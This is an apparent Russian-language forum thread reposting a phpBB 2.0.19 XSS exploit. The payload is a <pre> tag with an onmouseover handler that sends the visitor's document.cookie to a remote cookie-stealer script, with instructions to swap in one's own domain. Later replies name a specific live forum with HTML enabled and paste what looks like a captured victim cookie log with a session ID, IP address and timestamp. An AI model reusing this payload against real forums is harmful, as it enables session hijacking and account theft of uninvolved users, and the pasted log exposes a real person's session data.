phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit
 

# to be used with cookie stealer located here: http://www.milw0rm.com/id.php?id=1103
# Make sure you change www.milw0rm.com to your domain. thnx. /str0ke
# Author: threesixthousan

/*
As long as html is ON in the latest version of phpBB forums,
several XSS attack vectors are possible. phpBB incorrectly
filters in both messages and profiles, making cookie stealing,
and other XSS attacks possible. the exploit leads to arbitary
javascript execution, which in turn can lead to html defacement.

use of the <pre> tag means that the cursor must pass it in the y
direction only. e.g. the mouse only needs to cross a point
horrizontaly equal to the link in order for the javascript to be executed.

the following is a simple attack:
*/

<pre a='>' onmouseover='document.location="http://www.milw0rm.com/cookie_stealer.php?c="+document.cook ie' b='<pre' >

[урл]http://www.somesite.com/[/урл]</pre>

"урл" пишем английскими буквами - url :)

Источник: _http://ivdb.org/poc/1236.htm

Это из тех что только при включенном HTML работают? As long as html is ON in the latest version of phpBB forums... Что он имеет ввиду?

Проблема в том, что на форуме должен быть включен Html, а он по умолчанию выключен и я еще не встречал форумов где он разрешен, так что...

html on bbcode on
http://contacti-bg.free.bg/cgi-php/phpbb2

Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3 A-1%3B%7D;%20phpbb2mysql_sid=5a07a75738cf88a448b65db d45a5d1d6;%20__utma=85799179.2542689321017482000.1 212853877.1212853877.1212853877.1;%20__utmb=857991 79;%20__utmc=85799179;%20__utmz=85799179.121285387 7.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none );%20phpbb2mysql_t=a%3A2%3A%7Bi%3A22%3Bi%3A1213117 583%3Bi%3A23%3Bi%3A1213118622%3B%7D<br> IP: 89.215.251.63<br> Date and Time: 10 June, 2008, 12:16 pm<br> Referer: <br><br><br>